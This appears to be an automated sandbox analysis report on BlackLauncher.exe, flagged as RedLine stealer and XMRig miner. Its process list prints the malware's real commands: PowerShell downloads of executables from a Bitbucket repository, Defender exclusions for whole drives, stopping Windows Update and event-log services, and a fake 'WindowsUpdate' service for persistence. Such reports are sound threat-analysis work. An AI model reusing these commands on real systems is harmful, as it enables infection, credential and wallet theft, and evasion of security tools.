Analysis Overview
SHA256
1d80f6a688af15e12116f444d8da85be020a3393aeaab885e4d0f8589ac23dc0
Threat Level: Known bad
The file BlackLauncher.exe was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
xmrig
XMRig Miner payload
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Stops running service(s)
Blocklisted process makes network request
UPX packed file
Loads dropped DLL
Executes dropped EXE
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-13 19:04
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-13 19:04
Reported
2024-07-13 19:07
Platform
win10-20240611-en
Max time kernel
151s
Max time network
158s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Update\pROUy3v.exe | N/A |
| N/A | N/A | C:\ProgramData\Update\vdVaFs5.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows11\Updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Update\vdVaFs5.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Update\pROUy3v.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\Windows11\Updater.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4304 set thread context of 1660 | N/A | C:\ProgramData\Update\vdVaFs5.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
| PID 4724 set thread context of 3184 | N/A | C:\ProgramData\Windows11\Updater.exe | C:\Windows\system32\conhost.exe |
| PID 4724 set thread context of 4748 | N/A | C:\ProgramData\Windows11\Updater.exe | C:\Windows\system32\svchost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rescache\_merged\4183903823\2290032291.pri | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Windows\rescache\_merged\1601268389\715946058.pri | C:\Windows\system32\taskmgr.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x320
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Start-Process -FilePath 'C:/Users/Admin/AppData/Local/Temp/BlackLauncher.exe' -ArgumentList '--rendering-driver opengl3 --admin-requested' -Verb RunAs "
C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe" --rendering-driver opengl3 --admin-requested
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/pROUy3v.exe'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/pROUy3v.exe'"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/vdVaFs5.exe'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/vdVaFs5.exe'"
C:\ProgramData\Update\pROUy3v.exe
C:\ProgramData\Update\pROUy3v.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\ProgramData\Update\vdVaFs5.exe
C:\ProgramData\Update\vdVaFs5.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WindowsUpdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WindowsUpdate"
C:\ProgramData\Windows11\Updater.exe
C:\ProgramData\Windows11\Updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.217.135.65:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 65.135.217.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.28.77:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 77.28.5.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| CH | 185.196.9.26:6302 | tcp | |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 51.15.193.130:10343 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 26.9.196.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 130.193.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| PL | 51.68.137.186:10343 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.137.68.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/3500-19-0x0000024D68EB0000-0x0000024D68ED2000-memory.dmp
memory/3500-22-0x0000024D69080000-0x0000024D690F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cpbmhpzc.tdf.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\logs\godot.log
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\SceneShaderGLES3\b8b300d8960ddf9f2e23f580909c77c774494a19eea0be58441e7393b5b6593c\fa7b62523470356194bdf709eb2639ab149a07cc.cache
| MD5 | a272a406be702b21b0b1a3382b88444a |
| SHA1 | bb2d40557e9e4d3db8f468b9d55c9abe5bbe33f3 |
| SHA256 | ee6193d85ae6e99d26669f1bdf5fdce7c2f38f38350341dc03783799941a9de6 |
| SHA512 | 64d62f434880eb4668ac01df9576ca6c2b7fa7a7e3b7ca8f92b4965ad5b1f1f3c0a129dc0dd5495b19f36e59c2b721443716279154b17d0a8a77e4177d94b1f4 |
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CopyShaderGLES3\600540f4401230daf6f94143fce3c800b0bc15f0f3dcbb1d423709df581135ef\fa7b62523470356194bdf709eb2639ab149a07cc.cache
| MD5 | 6fe39f9e93796b6d34b5fbf30caa4d75 |
| SHA1 | 80ea777c8646f2edccad68e2f1f00c05ac084d51 |
| SHA256 | 8075b36b512f632fdc1cb2028c4c9a21d4f1baf9ff2f64dc4d3857f9edb1b0b4 |
| SHA512 | 992385567a2c8d679f03adaaa3025e9d37e21021e4684c7e5e0aa1f634150a89d6b054fa06914f8c534c2a91304358ef2018057c377477f9886065a19f41b150 |
C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CanvasShaderGLES3\93783db0c338a2f64067c117bfba92aa04dd299bfe1fae15f2c90234aba6f117\fa7b62523470356194bdf709eb2639ab149a07cc.cache
| MD5 | a59a08a5a323b2188bb9c7ae3d55513b |
| SHA1 | b744cc17c893963b3a167a8594ac841b5008b96c |
| SHA256 | 1333f9d02221fe0423a43bcfe841ad8d63cc5212dc40a2589c63c108a019e4d9 |
| SHA512 | a1f089a437a7307e3287a2a58d8649708e6b8e8777ade8188202b51aebde981c74d1b95b3ab5cd1b613416a62236d08d5e80785159240c009fab32f9d734ffad |
memory/4396-55-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
memory/4548-61-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
memory/4548-62-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 5d574dc518025fad52b7886c1bff0e13 |
| SHA1 | 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7 |
| SHA256 | 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2 |
| SHA512 | 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 25cc7fa9acdb035f977e2b8dd376530d |
| SHA1 | 66440c4ef643007c5b9aa99e8420b6e750c8de8f |
| SHA256 | eda1f76078f29ba768a8d27e70678ba7f16f346d232f95d1e8788df1ea1bb666 |
| SHA512 | f1b9cb79707a926089a97396db9ed2940875e6c2d97638208171e5114c7893e3ae26004cc6f45c9236f469d55dbc2077178df68704e445e624e06ea04ce89cfc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 910ec3e745c8acc38fab61b097f35b77 |
| SHA1 | 24ad6c3e786c32d0f819588cad86cd24a5fa9a6a |
| SHA256 | 4763872528910615d1b4d6726ac5a8c042fb8f2378ddf249a3ac267958f227f9 |
| SHA512 | a5d90ece095a405884e148a6d46ef9f1d96d95dc37ed7c215b4d9432534a86d4262081a412117105f6b0bf5eee6a504de1275e8661bfa718c5ef2ba6413387e3 |
memory/4548-129-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
memory/4548-138-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
memory/4548-139-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ce426674fa9f8557fc70959699b837fa |
| SHA1 | 13379f99e1d7e25537c4c85d3ef042d31baede92 |
| SHA256 | c7754795670afb3d3ece891195b184629b513a078fd5c78763d82693c6da3c8e |
| SHA512 | 6cd49aeb172324b9ef770958691c0b908a01e23bd03c3f75043b944e13e19294c830a16a33bb2e58bccc7ed1dc85fabc03847e2a843d42f3e925cafbd5275ee9 |
memory/4548-165-0x00007FF6141A0000-0x00007FF618502000-memory.dmp
C:\ProgramData\Update\vdVaFs5.exe
| MD5 | ad2867dc002af2cca594f0b8202a1843 |
| SHA1 | 73b3ea99db621b71e7a4a13720c53ebe3a815521 |
| SHA256 | 2c0e4b4e5535c97fbf45309cbe7ff05006f06db1f3bf31983c7b0e7a7753900d |
